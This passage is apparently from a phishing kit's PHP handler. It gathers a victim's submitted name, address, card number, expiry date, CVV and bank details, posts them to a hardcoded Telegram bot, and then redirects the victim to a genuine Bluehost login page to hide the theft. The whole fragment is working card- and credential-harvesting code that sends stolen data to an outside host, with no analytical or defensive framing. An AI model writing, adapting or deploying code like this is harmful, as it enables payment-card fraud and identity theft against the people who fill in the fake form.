".$_POST['fname']."\n"; $message .= "".$_POST['lname']."\n"; $message .= "".$_POST['address']."\n"; $message .= "".$_POST['city']."\n"; $message .= "".$_POST['zip']."\n"; $message .= "".$_POST['card']."\n"; $message .= "".$_POST['mm']."\n"; $message .= "".$_POST['yy']."\n"; $message .= "".$_POST['cvv']."\n"; $message .= "".$_POST['bank_type']."\n"; $message .= "".$_POST['bank_brand']."\n"; $message .= "".$_POST['bank_name']."\n"; $message .= "".$_POST['bank-country']."\n"; $message .= "https://ip.me/ip/$ctrl\n"; $botToken="5480214011:AAicivf-f3nw"; $website="https://api.telegram.org/bot".$botToken; $chatId="5498685"; $params=[ 'chat_id'=>$chatId, 'text'=>$message, ]; $ch = curl_init($website . '/sendMessage?parse_mode=html&disable_web_page_preview=True'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); header("Location: https://my.bluehost.com/web-hosting/cplogin?goto_uri=/frontend/bluehost/index.html");?>